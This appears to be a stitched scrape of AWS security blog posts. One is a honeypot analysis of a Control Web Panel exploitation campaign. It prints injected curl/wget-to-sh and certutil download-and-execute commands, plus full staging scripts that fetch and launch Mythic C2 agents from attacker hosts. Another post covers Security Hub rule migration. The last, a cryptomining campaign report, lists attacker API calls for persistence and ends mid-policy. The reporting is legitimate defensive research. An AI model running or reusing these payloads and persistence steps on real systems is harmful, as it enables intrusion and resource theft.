Content-Disposition: form-data; name="recursive"

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="t_total"

(curl -fsSL -m180 hxxp://vc2.b1ack[.]cat:28571/slt||wget -T180 -q hxxp://vc2.b1ack[.]cat:28571/slt)|sh
------WebKitFormBoundaryrTrcHpS9ovyhBLtb--

For Windows systems, the threat actor used Microsoft’s certutil.exe utility to download the malware:

POST /panel/index.php?module=filemanager&acc=changePerm HTTP/1.1
host: xx.xxx.xxx.xxx:49153
content-type: multipart/form-data; boundary=----WebKitFormBoundaryrTrcHpS9ovyhBLtb
content-length: 557

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="fileName"

.bashrc
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="currentPath"

/home/panel
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="recursive"

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="t_total"

certutil.exe -urlcache -split -f hxxp://vc2.b1ack[.]cat:28571/swt C:\Users\Public\run.bat && C:\Users\Public\run.bat
------WebKitFormBoundaryrTrcHpS9ovyhBLtb--

When MadPot honeypots observe these exploitation attempts, they download the malicious payloads the same as vulnerable servers would. MadPot uses these observations to extract threat indicators at multiple layers of analysis.

Layer 1 β€” MadPot identified the staging URLs and underlying IP addresses hosting the malware:

hxxp://vc2.b1ack[.]cat:28571/slt (Linux script, SHA256: bdf17b3047a9c9de24483cce55279e62a268c01c2aba6ddadee42518a9ccddfc)
hxxp://196.251.116[.]232:28571/slt
hxxp://vc2.b1ack[.]cat:28571/swt (Windows script, SHA256: 6ec153a14ec3a2f38edd0ac411bd035d00668a860ee0140e087bb4083610f7cf)
hxxp://196.251.116[.]232:28571/swt

Layer 2 – MadPot’s analysis of the malware revealed that the Windows batch file (SHA256: 6ec153a1...) contained logic to detect system architecture and download the appropriate Mythic agent:

@echo off
setlocal enabledelayedexpansion

set u64="hxxp://196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=w64&stage=true"
set u32="hxxp://196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=w32&stage=true"
set v="C:\Users\Public\350b0949tcp.exe"
del %v%
for /f "tokens=*" %%A in ('wmic os get osarchitecture ^| findstr 64') do (
    set "ARCH=64"
)
if "%ARCH%"=="64" (
    certutil.exe -urlcache -split -f %u64% %v%
) else (
    certutil.exe -urlcache -split -f %u32% %v%
)

start "" %v%
exit /b 0

The Linux script (SHA256: bdf17b30...) supported x86_64, i386, i686, aarch64, and armv7l architectures:

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

l64="196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=l64&stage=true"
l32="196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=l32&stage=true"
a64="196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=a64&stage=true"
a32="196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=a32&stage=true"

v="43b6f642tcp"
rm -rf $v

ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
    (curl -fsSL -m180 $l64 -o $v||wget -T180 -q $l64 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$l64'", "'$v'")')
elif [ ${ARCH}x = "i386x" ]; then
    (curl -fsSL -m180 $l32 -o $v||wget -T180 -q $l32 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$l32'", "'$v'")')
# [additional architecture checks]
fi

chmod +x $v
(nohup $(pwd)/$v > /dev/null 2>&1 &) || (nohup ./$v > /dev/null 2>&1 &)

Layer 3 – By analyzing these staging scripts and referenced infrastructure, MadPot identified additional threat indicators revealing Mythic C2 framework endpoints:

Health check endpoint 196.251.116[.]232:7443 and vc2.b1ack[.]cat:7443
HTTP listener 196.251.116[.]232:80 and vc2.b1ack[.]cat:80

Within 30 minutes of MadPot’s analysis, Network Firewall instances globally deployed protection rules targeting every layer of this attack infrastructure. Vulnerable CWP installations remained protected against this campaign because when the exploit tried to execute curl -fsSL -m180 hxxp://vc2.b1ack[.]cat:28571/slt or certutil.exe -urlcache -split -f hxxp://vc2.b1ack[.]cat:28571/swt Network Firewall would have blocked both resolution of vc2.b1ack[.]cat domain and connections to 196.251.116[.]232:28571 for as long as the infrastructure was active. The vulnerable application might have executed the exploit payload, but Network Firewall blocked the malware download at the network layer.

Even if the staging scripts somehow reached a target through alternate means, they would fail when attempting to download Mythic agent binaries. The architecture-specific URLs would have been blocked. If a Mythic agent binary was somehow delivered and executed through a completely different infection vector, it still could not establish command-and-control. When the malware attempted to connect to the Mythic framework’s health endpoint on port 7443 or the HTTP listener on port 80, Network Firewall would have terminated those connections at the network perimeter.

This scenario shows how the active threat defense intelligence pipeline disrupts different stages of threat activities. This is the Swiss cheese model in practice: even when one defensive layer (for example OAST blocking) isn’t applicable, subsequent layers (downloading hosted malware, network behavior from malware, identifying botnet infrastructure) provide overlapping protection. MadPot analysis of the attack reveals additional threat indicators at each layer that would protect customers at different stages of the attack chain.

For GuardDuty customers with unpatched CWP installations, this meant they would have received threat detection findings for communication attempts with threat indicators tracked in active threat detection. For Network Firewall customers using active threat detection, unpatched CWP workloads would have automatically been protected against this campaign even before this CVE was added to the CISA Known Exploitable Vulnerability list on November 4.

Conclusion

AWS active threat defense for Network Firewall uses MadPot intelligence and multi-layered protection to disrupt attacker kill chains and reduce the operational burden for security teams. With automated rule deployment, active threat defense creates multi-layered defenses within 30 minutes of new threats being detected by MadPot. Amazon GuardDuty customers automatically receive threat detection findings when workloads attempt to communicate with malicious infrastructure identified by active threat defense, while AWS Network Firewall customers can actively block these threats using the active threat defense managed rule group. To get started, see Improve your security posture using Amazon threat intelligence on AWS Network Firewall.

Β 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
Β 

Rahi Patel Rahi Patel
Rahi is a Startups Technical Account Manager at AWS specializing in Networking. He architects cloud networking solutions optimizing performance across global AWS deployments. Previously a network engineer with Cisco Meraki, he holds an MS in Engineering from San Jose State University. Outside work, he enjoys tennis and pickleball.
Paul Bodmer Paul Bodmer
Paul is a Security Engineering Manager at AWS, leading the Perimeter Protection Threat Research Team. He is responsible for the strategic direction of how AWS uses deception technology to produce actionable threat intelligence for AWS internal and external security services.
Nima Sharifi Mehr Nima Sharifi Mehr
Nima is a Principal Security Engineer at AWS, overseeing the technical direction of the Perimeter Protection Threat Research Team. He created MadPot, now a pillar of the Amazon cybersecurity strategy, used by teams across the company to protect customers and partners while raising global cybersecurity standards.
Maxim Raya Maxim Raya
Maxim is a Security Specialist Solutions Architect at AWS. In this role, he helps clients accelerate their cloud transformation by increasing their confidence in the security and compliance of their AWS environments.
Santosh Shanbhag Santosh Shanbhag
Santosh is a seasoned product leader, specializing in security, data protection, and compliance. At AWS, he focuses on securing workloads through Network and Application Security services, including AWS Network Firewall and active threat defense.

Security Hub CSPM automation rule migration to Security Hub

17 December 2025 at 22:06

A new version of AWS Security Hub is now generally available with new capabilities to aggregate, correlate, and contextualize your security alerts across Amazon Web Services (AWS) accounts. The prior version is now known as AWS Security Hub CSPM and will continue to be available as a unique service focused on cloud security posture management and finding aggregation.

One capability available in both services is automation rules. In both Security Hub and Security Hub CSPM, you can use automation rules to automatically update finding fields when the criteria they define are met. In Security Hub, automation rules can be used to send findings to third-party platforms for operational response. Many existing Security Hub CSPM users have automation rules for tasks such as elevating the severity of a finding because it affects a production resource or adding a comment to assist in remediation workflows. While both services offer similar automation rule functionality, rules aren’t synchronized across the two services. If you are an existing Security Hub CSPM customer looking to adopt the new Security Hub, you might be interested in migrating the automation rules that have already been built. This helps keep your automation rules processing close to where you’re reviewing findings. As of publication, this capability is included in the cost of the Security Hub essentials plan. For current pricing details, refer to the Security Hub pricing page.

This post provides a solution to automatically migrate automation rules from Security Hub CSPM to Security Hub, helping you maintain your security automation workflows while taking advantage of the new Security Hub features. If you aren’t currently using automation rules and want to get started, see Automation rules in Security Hub.

Automation rule migration challenge

Security Hub CSPM uses the AWS Security Finding Format (ASFF) as the schema for its findings. This schema is fundamental to how automation rules are applied to findings as they are generated. Automation rules begin by defining one or more criteria and then selecting one or more actions that will be applied when the specified criteria are met. Each criterion specifies an ASFF field, an operator (such as equals or contains), and a value. Actions then update one or more ASFF fields.

The new version of Security Hub uses the Open Cybersecurity Schema Framework (OCSF), a widely adopted open-source schema supported by AWS and partners in the cybersecurity industry. Security Hub automation rules structurally work the same way as Security Hub CSPM rules. However, the underlying schema change means existing automation rules require transformation.

The solution provided in this post automatically discovers Security Hub CSPM automation rules, transforms them into the OCSF schema, and creates an AWS CloudFormation template that you can use to deploy them to your AWS account running the new version of Security Hub. Because of inherent differences between the ASFF and OCSF schemas, some rules can’t be automatically migrated, while others might require manual review after migration.

The following table show the current mapping between ASFF fields supported as criteria and their corresponding OCSF fields. These mappings may change in future service releases. Fields marked as N/A can’t be migrated and will require special consideration when migrating automation rules. They need to be redesigned in the new Security Hub. The solution provided in this post is designed to skip migration of rules with one or more ASFF criteria that don’t map to an OCSF field but will identify those rules in a report for your review.

Rule criterion in ASFF Corresponding OCSF field
AwsAccountId cloud.account.uid
AwsAccountNameΒ  cloud.account.name
CompanyNameΒ  metadata.product.vendor_nameΒ 
ComplianceAssociatedStandardsId compliance.standards
ComplianceSecurityControlIdΒ  compliance.controlΒ 
ComplianceStatusΒ  compliance.statusΒ 
ConfidenceΒ  confidence_score
CreatedAtΒ  finding_info.created_timeΒ 
CriticalityΒ  N/A
DescriptionΒ  finding_info.descΒ 
FirstObservedAtΒ  finding_info.first_seen_time
GeneratorIdΒ  N/A
IdΒ  finding_info.uidΒ 
Β LastObservedAt finding_info.last_seen_timeΒ 
Β NoteText commentΒ 
NoteUpdatedAtΒ  N/A
NoteUpdatedByΒ  N/A
ProductArnΒ  metadata.product.uidΒ 
ProductNameΒ  metadata.product.nameΒ 
RecordStateΒ  activity_nameΒ 
RelatedFindingsIdΒ  N/A
RelatedFindingsProductArnΒ  N/A
ResourceApplicationArnΒ  N/A
ResourceApplicationNameΒ  N/A
ResourceDetailsOtherΒ  N/A
ResourceIdΒ  resources[x].uidΒ 
ResourcePartitionΒ  resources[x].cloud_partitionΒ 
ResourceRegionΒ  resources[x].regionΒ 
ResourceTagsΒ  resources[x].tagsΒ 
ResourceTypeΒ  resources[x].typeΒ 
SeverityLabelΒ  vendor_attributes.severityΒ 
SourceUrlΒ  finding_info.src_urlΒ 
TitleΒ  finding_info.titleΒ 
TypeΒ  finding_info.typesΒ 
UpdatedAtΒ  finding_info.modified_timeΒ 
UserDefinedFieldsΒ  N/A
VerificationStateΒ  N/A
WorkflowStatusΒ  statusΒ 

The following table shows the ASFF fields that are supported as actions and their corresponding OCSF fields. Note that several action fields aren’t available in OCSF:

Rule action fields in ASFF Corresponding OCSF field
ConfidenceΒ  N/A
CriticalityΒ  N/A
NoteΒ  CommentΒ 
RelatedFindingsΒ  N/A
SeverityΒ  SeverityΒ 
TypesΒ  N/A
UserDefinedFieldsΒ  N/A
VerificationStateΒ  N/A
Workflow StatusΒ  StatusΒ 

For Security Hub CSPM automation rules that include actions without OCSF equivalents, the solution is designed to migrate the rules but include only the supported actions. These rules will be designated as partially migrated in the rule description and the migration report. You can use this information to review and modify the rules before enabling them, helping to ensure that the new automation rules behave as expected.

Solution overview

This solution provides a set of Python scripts designed to assist with the migration of automation rules from Security Hub CSPM to the new Security Hub. Here’s how the migration process works:

  1. Begin migration: The solution provides an orchestration script that initiates three sub-scripts and manages passing the proper inputs to them.
  2. Discovery: The solution scans your Security Hub CSPM environment to identify and collect existing automation rules across specified AWS Regions.
  3. Analysis: Each rule is evaluated to determine if it can be fully migrated, partially migrated, or requires manual intervention based on ASFF to OCSF field mapping compatibility.
  4. Transformation: Compatible rules are automatically converted from the ASFF schema to the OCSF schema using predefined field mappings.
  5. Template creation: The solution generates a CloudFormation template containing the transformed rules, maintaining their original order and Regional context.
  6. Deployment: Review the generated template and deploy it to create the migrated rules in Security Hub, where they are created in a disabled state by default.
  7. Validate and enable rules: Review each migrated rule in the AWS Management Console for Security Hub to verify its criteria, actions, and preview your current matching findings if applicable. After confirming that the rules work as intended individually and as a sequence, enable them to resume your automation workflows.
Figure 1: Architecture diagram showing scripts and how they interact with AWS

Figure 1: Architecture diagram showing scripts and how they interact with AWS

The solution, shown in Figure 1, consists of four Python scripts that work together to migrate your automation rules:

  1. Orchestrator: Coordinates discovery, transformation, and generation along with reporting and logging
  2. Rule discovery: Identifies and extracts existing automation rules from Security Hub CSPM across the Regions you specify
  3. Schema transformation: Converts the rules from ASFF to OCSF format using the field mapping detailed earlier
  4. Template generation: Creates CloudFormation templates that you can use to deploy the migrate rules

The scripts use credentials configured using the AWS Command Line Interface (AWS CLI) to discover existing Security Hub automation rules. For details on how to configure credentials using AWS CLI, see Setting up the AWS CLI.

Prerequisites

Before running the solution, ensure you have the following components and permissions in place.

  • Required software:
    • AWS CLI (latest version)
    • Python 3.12 or later
    • Python packages:
      • boto3 (latest version)
      • pyyaml (latest version)
  • Required permissions:
    For rule discovery and transformation:

    • securityhub:ListAutomationRules
    • securityhub:BatchGetAutomationRules
    • securityhub:GetFindingAggregator
    • securityhub:DescribeHub
    • securityhub:ListAutomationRulesV2

    For template deployment:

    • cloudformation:CreateStack
    • cloudformation:UpdateStack
    • cloudformation:DescribeStacks
    • cloudformation:CreateChangeSet
    • cloudformation:DescribeChangeSet
    • cloudformation:ExecuteChangeSet
    • cloudformation:GetTemplateSummary
    • securityhub:CreateAutomationRuleV2
    • securityhub:UpdateAutomationRuleV2
    • securityhub:DeleteAutomationRuleV2
    • securityhub:GetAutomationRuleV2
    • securityhub:TagResource
    • securityhub:ListTagsForResource

AWS account configuration

Security Hub supports a delegated administrator account model when used with AWS Organizations. This delegated administrator account centralizes the management of security findings and service configuration across your organization’s member accounts. Automation rules must be created in the delegated administrator account in the home Region, and in unlinked Regions. Member accounts can’t create their own automation rules.

We recommend using the same account as the delegated administrator for Security Hub CSPM and Security Hub to maintain consistent security management. Configure your AWS CLI with credentials for this delegated administrator account before running the migration solution (see Setting up the AWS CLI for more information).

While this solution is primarily designed for delegated administrator deployments, it also supports single-account Security Hub implementations.

Key migration concepts

Before proceeding with the migration of your automation rules from Security Hub CSPM to Security Hub, it’s important to understand several key concepts that affect how rules are migrated and deployed. These concepts influence the migration process and the resulting behavior of your rules. Understanding them will help you plan your migration strategy and validate the results effectively.

Default rule state

By default, migrated rules are created in a DISABLED state, meaning the actions will not be applied to findings as they are generated. The solution can optionally create rules in an ENABLED state, but this is not recommended. Instead, create the rules in a DISABLED state, review each rule, preview matching findings, and then move the rule to an ENABLED state when ready.

Unsupported fields

The migration report details any rules that can’t be migrated because they include one or more Security Hub CSPM criteria that aren’t supported by the new Security Hub. These cases occur because of the differences between the ASFF and OCSF schemas. These rules require special attention because they can’t be automatically replicated with equivalent behavior. This is particularly important if you have Security Hub CSPM rules that depend on priority order.

When rules have actions that aren’t supported, they will still be migrated if at least one action is supported. Rules with partially supported actions are flagged in the migration report and the new automation rule description and should be reviewed.

Home and linked Regions

Both Security Hub CSPM and Security Hub support a home Region that aggregates findings from linked Regions. However, their automation rules behave differently. Security Hub CSPM automation rules operate on a Regional basis. This means they only affect findings generated in the Region where they are created. Even if you use a home Region, Security Hub CSPM automation rules do not apply to the findings aggregated from linked Regions in the home Region. Security Hub supports automation rules defined in a home Region and applied to all linked Regions, and does not support the creation of automation rules in linked Regions. However, in Security Hub, unlinked Regions can still have their own automation rules that will affect only the findings generated in that Region. Unlinked Regions will need to have automation rules applied separately

The solution supports two deployment modes to handle these differences. The first mode, called Home Region, should be used for Security Hub deployments with a home Region enabled. This mode identifies Security Hub CSPM automation rules from specified Regions and then recreates them with an additional criteria to account for the Region the rule came from. Then, one CloudFormation template is generated that can be deployed in the home Region. The automation rules will still operate as intended because of the addition of the criteria for the original Region where it was created.

The second mode is called Region-by-Region. This mode is for users who don’t currently use a home Region. In this mode, the solution still discovers automation rules in the Regions specified but generates a unique CloudFormation template for each Region. The resulting templates can then be deployed one by one to the delegated administrator account for their corresponding Region. No additional criteria are added to the automation rule in this mode.

It is possible to use a home Region with Security Hub and link some Regions, but not all. If this is the case, run the Home Region mode for the home Region and all linked Regions. Then, re-run the solution in Region-by-Region mode for all unlinked Regions.

Rule order

Both Security Hub CSPM and Security Hub automation rules have an order in which they are evaluated. This can be important for certain situations where different automation rules might apply to the same findings or take actions on the same fields. This solution preserves the original order of your automation rules.

If there are existing Security Hub automation rules, the solution creates the new automation rules beginning after the existing rules. For example, if you have 3 Security Hub automation rules and are migrating 10 new rules, the solution will assign orders 4 through 13 to the new rules.

When using the Home Region mode, the order of automation rules for each Region is preserved and clustered together in the final order. For example, if a user with three Security Hub automation rules in three different Regions migrates the rules, they will be migrated sequentially. The solution will first migrate all rules from Region 1 in their original order, followed by all rules from Region 2 in their original order, and finally all rules from Region 3 in their original order.

Deploy and validate the migration

Now that you have the prerequisites in place and understand the basic concepts, you’re ready to deploy and validate the migration.

To deploy the migration:

1. Clone the Security Hub automation rules Migration Tool from the AWS samples GitHub repository:

git clone https://github.com/aws-samples/sample-SecurityHub-Automation-Rule-Migration.git

2. Run the scripts following the instructions of the README file, which will contain the most up-to-date implementation instructions. This will generate a CloudFormation template that will create the new Security Hub automation rules. Deploy the CloudFormation template using the AWS CLI or console. For more details, see the Create a stack from the CloudFormation console or the README file.

When deployment is complete, you can use the Security Hub console to review your migrated automation rules. Remember that rules are created in a DISABLED state by default. Review each rule’s criteria and actions carefully, checking that they match your intended automation workflow. You can also preview what existing findings would have matched each automation rule in the console.

To review and validate migrated rules:

1. Go to the Security Hub console and choose Automations from the navigation pane.

Figure 2: Security Hub Automations page

Figure 2: Security Hub Automations page

2. Select a rule and then choose Edit at the top of the page.

Figure 3: Security Hub automation rule details

Figure 3: Security Hub automation rule details

3. Choose Preview matching findings. It’s possible that no findings will be returned even if the automation rule is behaving as expected. This means only that there are currently no findings matching the rule criteria in Security Hub. In this case, you can still review the rule criteria.

Figure 4: Security Hub Edit automation rule page

Figure 4: Security Hub Edit automation rule page

4. After validating a rule’s configuration, you can enable it through the console from the rule editing page. You can also update the CloudFormation stack. If you didn’t need to change any criteria or actions of your automation rules, you can re-run the scripts with the optional β€”create-enabled flag to reproduce the CloudFormation template with all rules enabled and deploy it as an update to the existing stack.

Pay attention to any rules that have partially migrated actions, which will be noted in the Description of each rule. This means one or more actions from the original rule in Security Hub CSPM aren’t supported in Security Hub and the rule might behave differently than intended. The solution also produces a migration report that includes which rules were partially migrated and specifies which actions from the original rule could not be migrated. Review these rules carefully because they might behave differently than expected and need to be modified or recreated.

Figure 5: Review the descriptions of partially migrated automation rules

Figure 5: Review the descriptions of partially migrated automation rules

Conclusion

The new AWS Security Hub provides enhanced capabilities for aggregating, correlating, and contextualizing your security findings. While the schema change from ASFF to OCSF brings improved interoperability and integration options, it requires existing automation rules to be migrated. The solution provided in this post helps automate this migration process through discovering your existing rules, transforming them to the new schema, and generating CloudFormation templates that preserve rule order and Regional context.

After migrating your automation rules, start by reviewing the migration report to identify any rules that weren’t fully migrated. Pay special attention to rules marked as partially migrated, because these might behave differently than their original versions. We recommend testing each rule in a disabled state and validating that rules work together as expectedβ€”especially rules that operate on the same fieldsβ€”before enabling them in your environment.

To learn more about Security Hub and its enhanced capabilities, see the Security Hub User Guide.
If you have feedback about this post, submit comments in the Comments section below.

Joe Wagner

Joe Wagner

Joe is a Senior Security Specialist Solutions Architect who focuses on AWS security services. He loves that cybersecurity is always changing and takes pride in helping his customers navigate it all. Outside of work, you’ll find him trying new hobbies, exploring local restaurants, and getting outside as much as he can.

Ahmed Adekunle

Ahmed Adekunle

Ahmed is a Security Specialist Solutions Architect focused on detection and response services at AWS. Before AWS, his background was in business process management and AWS tech consulting, helping customers use cloud technology to transform their business. Outside of work, Ahmed enjoys playing soccer, supporting less privileged activities, traveling, and eating spicy food, specifically African cuisine.

Salifu (Sal) Ceesay

Salifu (Sal) Ceesay

Sal is a Technical Account Manager at Amazon Web Services (AWS) specializing in financial services. He partners with organizations to operationalize and optimize managed solutions across many use cases, with expertise in native incident detection and response services. Beyond his professional pursuits, Sal enjoys gardening, playing and watching soccer, traveling, and participating in various outdoor activities with his family.

GuardDuty Extended Threat Detection uncovers cryptomining campaign on Amazon EC2 and Amazon ECS

16 December 2025 at 23:12

Amazon GuardDuty and our automated security monitoring systems identified an ongoing cryptocurrency (crypto) mining campaign beginning on November 2, 2025. The operation uses compromised AWS Identity and Access Management (IAM) credentials to target Amazon Elastic Container Service (Amazon ECS) and Amazon Elastic Compute Cloud (Amazon EC2). GuardDuty Extended Threat Detection was able to correlate signals across these data sources to raise a critical severity attack sequence finding. Using the massive, advanced threat intelligence capability and existing detection mechanisms of Amazon Web Services (AWS), GuardDuty proactively identified this ongoing campaign and quickly alerted customers to the threat. AWS is sharing relevant findings and mitigation guidance to help customers take appropriate action on this ongoing campaign.

It’s important to note that these actions don’t take advantage of a vulnerability within an AWS service but rather require valid credentials that an unauthorized user uses in an unintended way. Although these actions occur in the customer domain of the shared responsibility model, AWS recommends steps that customers can use to detect, prevent, or reduce the impact of such activity.

Understanding the crypto mining campaign

The recently detected crypto mining campaign employed a novel persistence technique designed to disrupt incident response and extend mining operations. The ongoing campaign was originally identified when GuardDuty security engineers discovered similar attack techniques being used across multiple AWS customer accounts, indicating a coordinated campaign targeting customers using compromised IAM credentials.

Operating from an external hosting provider, the threat actor quickly enumerated Amazon EC2 service quotas and IAM permissions before deploying crypto mining resources across Amazon EC2 and Amazon ECS. Within 10 minutes of the threat actor gaining initial access, crypto miners were operational.

A key technique observed in this attack was the use of ModifyInstanceAttribute with disable API termination set to true, forcing victims to re-enable API termination before deleting the impacted resources. Disabling instance termination protection adds an additional consideration for incident responders and can disrupt automated remediation controls. The threat actor’s scripted use of multiple compute services, in combination with emerging persistence techniques, represents an advancement in crypto mining persistence methodologies that security teams should be aware of.

The multiple detection capabilities of GuardDuty successfully identified the malicious activity through EC2 domain/IP threat intelligence, anomaly detection, and Extended Threat Detection EC2 attack sequences. GuardDuty Extended Threat Detection was able to correlate signals as an AttackSequence:EC2/CompromisedInstanceGroup finding.

Indicators of compromise (IoCs)

Security teams should monitor for the following indicators to identify this crypto mining campaign. Threat actors frequently modify their tactics and techniques, so these indicators might evolve over time:

  • Malicious container image – The Docker Hub image yenik65958/secret, created on October 29, 2025, with over 100,000 pulls, was used to deploy crypto miners to containerized environments. This malicious image contained a SBRMiner-MULTI binary for crypto mining. This specific image has been taken down from Docker Hub, but threat actors might deploy similar images under different names.
  • Automation and tooling – AWS SDK for Python (Boto3) user agent patterns indicating Python-based automation scripts were used across the entire attack chain.
  • Crypto mining domains: asia[.]rplant[.]xyz, eu[.]rplant[.]xyz, and na[.]rplant[.]xyz.
  • Infrastructure naming patterns – Auto scaling groups followed specific naming conventions: SPOT-us-east-1-G*-* for spot instances and OD-us-east-1-G*-* for on-demand instances, where G indicates the group number.

Attack chain analysis

The crypto mining campaign followed a systematic attack progression across multiple phases. Sensitive fields in this post were given fictitious values to protect personally identifiable information (PII).

Cryptocurrency Mining Campaign Diagram

Figure 1: Cryptocurrency mining campaign diagram

Initial access, discovery, and attack preparation

The attack began with compromised IAM user credentials possessing admin-like privileges from an anomalous network and location, triggering GuardDuty anomaly detection findings. During the discovery phase, the attacker systematically probed customer AWS environments to understand what resources they could deploy. They checked Amazon EC2 service quotas (GetServiceQuota) to determine how many instances they could launch, then tested their permissions by calling the RunInstances API multiple times with the DryRun flag enabled.

The DryRun flag was a deliberate reconnaissance tactic that allowed the actor to validate their IAM permissions without actually launching instances, avoiding costs and reducing their detection footprint. This technique demonstrates the threat actor was validating their ability to deploy crypto mining infrastructure before acting. Organizations that don’t typically use DryRun flags in their environments should consider monitoring for this API pattern as an early warning indicator of compromise. AWS CloudTrail logs can be used with Amazon CloudWatch alarms, Amazon EventBridge, or your third-party tooling to alert on these suspicious API patterns.

The threat actor called two APIs to create IAM roles as part of their attack infrastructure: CreateServiceLinkedRole to create a role for auto scaling groups and CreateRole to create a role for AWS Lambda. They then attached the AWSLambdaBasicExecutionRole policy to the Lambda role. These two roles were integral to the impact and persistence stages of the attack.

Amazon ECS impact

The threat actor first created dozens of ECS clusters across the environment, sometimes exceeding 50 ECS clusters in a single attack. They then called RegisterTaskDefinition with a malicious Docker Hub image yenik65958/secret:user. With the same string used for the cluster creation, the actor then created a service, using the task definition to initiate crypto mining on ECS AWS Fargate nodes. The following is an example of API request parameters for RegisterTaskDefinition with a maximum CPU allocation of 16,384 units.

{ Β Β 
    "dryrun": false, Β Β 
    "requiresCompatibilities": ["FARGATE"], Β Β 
    "cpu": 16384, Β Β 
    "containerDefinitions": [ Β Β  Β 
        { Β Β  Β  Β 
            "name": "a1b2c3d4e5", Β Β  Β  Β 
            "image": "yenik65958/secret:user", Β Β  Β  Β 
            "cpu": 0, Β Β  Β  Β 
            "command": [] Β Β  Β 
        } Β Β 
    ], Β Β 
    "networkMode": "awsvpc", Β Β 
    "family": "a1b2c3d4e5", Β Β 
    "memory": 32768 
}

Using this task definition, the threat actor called CreateService to launch ECS Fargate tasks with a desired count of 10.

{ Β Β 
    "dryrun": false, Β Β 
    "capacityProviderStrategy": [ Β Β  Β 
        { Β Β  Β  Β 
            "capacityProvider": "FARGATE", Β Β  Β  Β 
            "weight": 1, Β Β  Β  Β 
            "base": 0 Β Β  Β 
        }, Β Β  Β 
        { Β Β  Β  Β 
            "capacityProvider": "FARGATE_SPOT", Β Β  Β  Β 
            "weight": 1, Β Β  Β  Β 
            "base": 0 Β Β  Β 
        } Β Β 
    ], Β Β 
    "desiredCount": 10 
}

Figure 2: Contents of the cryptocurrency mining script within the malicious image

Figure 2: Contents of the cryptocurrency mining script within the malicious image

The malicious image (yenik65958/secret:user) was configured to execute run.sh after it has been deployed. run.sh runs randomvirel mining algorithm with the mining pools: asia|eu|na[.]rplant[.]xyz:17155. The flag nproc --all indicates that the script should use all processor cores.

Amazon EC2 impact

The actor created two launch templates (CreateLaunchTemplate) and 14 auto scaling groups (CreateAutoScalingGroup) configured with aggressive scaling parameters, including a maximum size of 999 instances and desired capacity of 20. The following example of request parameters from CreateLaunchTemplate shows the UserData was supplied, instructing the instances to begin crypto mining.

{ Β Β 
    "CreateLaunchTemplateRequest": { Β Β  Β  Β 
        "LaunchTemplateName": "T-us-east-1-a1b2", Β  Β  Β Β 
        "LaunchTemplateData": { Β  Β  Β  Β  Β Β 
            "UserData": "<sensitiveDataRemoved>", Β  Β  Β  Β  Β Β 
            "ImageId": "ami-1234567890abcdef0", Β  Β  Β  Β  Β Β 
            "InstanceType": "c6a.4xlarge" Β  Β  Β Β 
        }, Β  Β  Β Β 
        "ClientToken": "a1b2c3d4-5678-90ab-cdef-EXAMPLE11111" Β Β 
    } 
}

The threat actor created auto scaling groups using both Spot and On-Demand Instances to make use of both Amazon EC2 service quotas and maximize resource consumption.

Spot Instance groups:

  • Targeted high performance GPU and machine learning (ML) instances (g4dn, g5, g5, p3, p4d, inf1)
  • Configured with 0% on-demand allocation and capacity-optimized strategy
  • Set to scale from 20 to 999 instances

On-Demand Instance groups:

  • Targeted compute, memory, and general-purpose instances (c5, c6i, r5, r5n, m5a, m5, m5n).
  • Configured with 100% on-demand allocation
  • Also set to scale from 20 to 999 instances

After exhausting auto scaling quotas, the actor directly launched additional EC2 instances using RunInstances to consume the remaining EC2 instance quota.

Persistence

An interesting technique observed in this campaign was the threat actor’s use of ModifyInstanceAttribute across all launched EC2 instances to disable API termination. Although instance termination protection prevents accidental termination of the instance, it adds an additional consideration for incident response capabilities and can disrupt automated remediation controls. The following example shows request parameters for the API ModifyInstanceAttribute.

{ Β Β  Β 
    "disableApiTermination": { Β Β  Β  Β  Β 
        "value": true Β Β  Β 
    }, Β Β  Β 
    "instanceId": "i-1234567890abcdef0" 
}

After all mining workloads were deployed, the actor created a Lambda function with a configuration that bypasses IAM authentication and creates a public Lambda endpoint. The threat actor then added a permission to the Lambda function that allows the principal to invoke the function. The following examples show CreateFunctionUrlConfig and AddPermission request parameters.

CreateFunctionUrlConfig:

{ Β Β  Β 
    "authType": "NONE", Β Β  Β 
    "functionName": "generate-service-a1b2c3d4" 
}

AddPermission:

{ Β Β  Β 
    "functionName": "generate-service-a1b2c3d4", Β Β  Β 
    "functionUrlAuthType": "NONE", Β Β  
    "principal": "*", Β Β  Β 
    "statementId": "FunctionURLAllowPublicAccess", Β Β  Β 
    "action": "lambda:InvokeFunctionUrl" 
}

The threat actor concluded the persistence stage by creating an IAM user user-x1x2x3x4 and attaching the IAM policy AmazonSESFullAccess (CreateUser, AttachUserPolicy). They also created an access key and login profile for that user (CreateAccessKey, CreateLoginProfile). Based on the SES role that was attached to the user, it appears the threat actor was attempting Amazon Simple Email Service (Amazon SES) phishing.

To prevent public Lambda URLs from being created, organizations can deploy service control policies (SCPs) that deny creation or updating of Lambda URLs with an AuthType of β€œNONE”.

{ Β Β 
    "Version": "2012-10-17", Β Β 
    "Statement": [ Β Β  Β 
        { Β Β  Β  Β 
            "Effect": "Deny", Β Β  Β  Β 
            "Action": [ Β Β  Β  Β  Β 
                "lambda:CreateFunctionUrlConfig", Β Β  Β  Β  Β 
                "lambda:UpdateFunctionUrlConfig" Β Β  Β  Β 
            ], Β Β  Β  Β 
            "Resource": "arn:aws:lambda:*:*:function/*", Β Β  Β  Β 
            "Condition": { Β Β  Β  Β  Β 
                "StringEquals": { Β Β  Β  Β  Β  Β 
